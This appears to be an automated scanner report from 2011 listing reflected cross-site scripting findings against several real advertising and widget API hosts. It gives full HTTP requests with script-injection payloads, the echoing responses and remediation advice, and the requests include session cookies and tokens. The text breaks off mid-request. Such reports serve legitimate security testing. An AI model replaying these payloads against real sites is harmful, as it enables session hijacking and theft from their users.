BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KTissx4pIKRxvaj5XcunNcMDa7Re6IGD4lOuDZWVHyjN4Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAipIisFvtN4t4VEVUJBxdqAyBAisqZAs2SfkIE4k0isgs29d6PAF0Hy6gC0ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 Content-Length: 206 Connection: keep-alive
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload af475<script>alert(1)</script>5b56c3fcd0c was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c&callback=Demdex.parseBizo HTTP/1.1 Host: api.bizographics.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRShFj6bKbiijaj5XcunNcMDa7Re6IGD4lLFCw41jWbyOAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyMfy5dfAVhDEVUJBxdqAyAsVh4uYPLmIgwbisDgBSipgnUuNumFpPoipAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Wed, 02 Feb 2011 16:18:36 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 92 Connection: Close
Unknown API key: (6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c)
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b4387(a)c27091d8173 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /EntityImageHandler.ashxb4387(a)c27091d8173 HTTP/1.1 Host: api.blogburst.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 16:18:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server: psnapib X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/plain; charset=utf-8 Content-Length: 201
Error handler problem: Error Number: B8BUa0w7Ilp7zBNRYRdWMLni Error Path: /EntityImageHandler.ashxb4387(a)c27091d8173 Error Message: No http handler was found for request type 'GET' Error Host: psnapib
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 80c92(a)e7e03c35472 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico80c92(a)e7e03c35472 HTTP/1.1 Host: api.blogburst.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server: psnapib X-AspNet-Version: 2.0.50727 X-Compressed-By: HttpCompress Date: Wed, 02 Feb 2011 19:10:36 GMT Content-Length: 189
Error handler problem: Error Number: B83sUW5V9btfzEZ9C74xOolh Error Path: /favicon.ico80c92(a)e7e03c35472 Error Message: No http handler was found for request type 'GET' Error Host: psnapib
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f5c81(a)8b15d9b73ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba HTTP/1.1 Host: api.blogburst.com Proxy-Connection: keep-alive Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server: psnapib X-AspNet-Version: 2.0.50727 X-Compressed-By: HttpCompress Date: Wed, 02 Feb 2011 15:32:08 GMT Content-Length: 205
Error handler problem: Error Number: B80iwlBCmlTpz5Pig5CAws6o Error Path: /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba Error Message: No http handler was found for request type 'GET' Error Host: psnapib
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e8e6e(a)55b1a46fc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7 HTTP/1.1 Host: api.blogburst.com Proxy-Connection: keep-alive Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server: psnapib X-AspNet-Version: 2.0.50727 X-Compressed-By: HttpCompress Date: Wed, 02 Feb 2011 15:32:19 GMT Content-Length: 207
Error handler problem: Error Number: B94M87SkpIdWCgjC0l2bFGg Error Path: /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7 Error Message: No http handler was found for request type 'GET' Error Host: psnapib
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4506(a)4a5cdf0844b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1 Host: api.blogburst.com Proxy-Connection: keep-alive Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server: psnapib X-AspNet-Version: 2.0.50727 PluckOriginServer: psnapib X-Compressed-By: HttpCompress Date: Wed, 02 Feb 2011 15:32:36 GMT Content-Length: 209
Error handler problem: Error Number: B8WJgPc8mOdez6tZwoiCJoTl Error Path: /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx Error Message: No http handler was found for request type 'GET' Error Host: psnapib
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b1dc(a)5a857af5c5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1 Host: api.blogburst.com Proxy-Connection: keep-alive Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server: psnapib X-AspNet-Version: 2.0.50727 PluckOriginServer: psnapib X-Compressed-By: HttpCompress Date: Wed, 02 Feb 2011 15:32:41 GMT Content-Length: 208
Error handler problem: Error Number: B7fOWSgosfbjAnIBtXULjlA Error Path: /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d Error Message: No http handler was found for request type 'GET' Error Host: psnapib
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5fda3<script>alert(1)</script>05613b280fe was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/v1/ip.json?token=9629e1a2b682d7afd8c9cc104ad125c08fa0b490&callback=demandbase_parse5fda3<script>alert(1)</script>05613b280fe HTTP/1.1 Host: api.demandbase.com Proxy-Connection: keep-alive Referer: http://www.omniture.com/en/privacy/2o7?f=2o7 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38302<script>alert(1)</script>c482f5e0c50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php. HTTP/1.1 Host: apptools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:18:40 GMT Server: Apache X-Mod-Pagespeed: 0.9.11.5-293 Vary: Accept-Encoding Content-Length: 3788 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php was not able to be displayed.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8e2a<script>alert(1)</script>5612df9d36a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a HTTP/1.1 Host: apptools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:18:41 GMT Server: Apache X-Mod-Pagespeed: 0.9.11.5-293 Vary: Accept-Encoding Content-Length: 3789 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a was not able to be displayed.</p> ...[SNIP]...
1.70. http://apptools.com/examples/tableheight.php. [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://apptools.com
Path:
/examples/tableheight.php.
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 96edc<script>alert(1)</script>1447630590d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 HTTP/1.1 Host: apptools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:18:40 GMT Server: Apache X-Mod-Pagespeed: 0.9.11.5-293 Vary: Accept-Encoding Content-Length: 3792 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 was not able to be displayed.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2523f<script>alert(1)</script>3ded236ecaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css HTTP/1.1 Host: apptools.com Proxy-Connection: keep-alive Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 20:26:31 GMT Server: Apache X-Mod-Pagespeed: 0.9.11.5-293 Vary: Accept-Encoding Content-Type: text/html Content-Length: 5125
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css was not able to be displayed.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e507e<script>alert(1)</script>60df3ed154 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles/apptools.csse507e<script>alert(1)</script>60df3ed154 HTTP/1.1 Host: apptools.com Proxy-Connection: keep-alive Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 20:26:41 GMT Server: Apache X-Mod-Pagespeed: 0.9.11.5-293 Vary: Accept-Encoding Content-Type: text/html Content-Length: 5124
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/styles/apptools.csse507e<script>alert(1)</script>60df3ed154 was not able to be displayed.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78363<script>alert(1)</script>31482200f99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles78363<script>alert(1)</script>31482200f99/print.css HTTP/1.1 Host: apptools.com Proxy-Connection: keep-alive Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 20:26:29 GMT Server: Apache X-Mod-Pagespeed: 0.9.11.5-293 Vary: Accept-Encoding Content-Type: text/html Content-Length: 5122
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/styles78363<script>alert(1)</script>31482200f99/print.css was not able to be displayed.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7876d<script>alert(1)</script>1b072629eeb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles/print.css7876d<script>alert(1)</script>1b072629eeb HTTP/1.1 Host: apptools.com Proxy-Connection: keep-alive Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 20:26:40 GMT Server: Apache X-Mod-Pagespeed: 0.9.11.5-293 Vary: Accept-Encoding Content-Type: text/html Content-Length: 5122
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/styles/print.css7876d<script>alert(1)</script>1b072629eeb was not able to be displayed.</p> ...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9fb5f<script>alert(1)</script>bb7775bca59 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=39fb5f<script>alert(1)</script>bb7775bca59&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 09 Feb 2011 15:31:53 GMT Date: Wed, 02 Feb 2011 15:31:53 GMT Connection: close Content-Length: 3603
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload a97d8<script>alert(1)</script>9a0c4e010c5 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338a97d8<script>alert(1)</script>9a0c4e010c5&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 09 Feb 2011 15:31:53 GMT Date: Wed, 02 Feb 2011 15:31:53 GMT Connection: close Content-Length: 3603
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 29d7a<script>alert(1)</script>1b41605cfe3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=507003329d7a<script>alert(1)</script>1b41605cfe3&c4=40443113&c5=59067898&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: 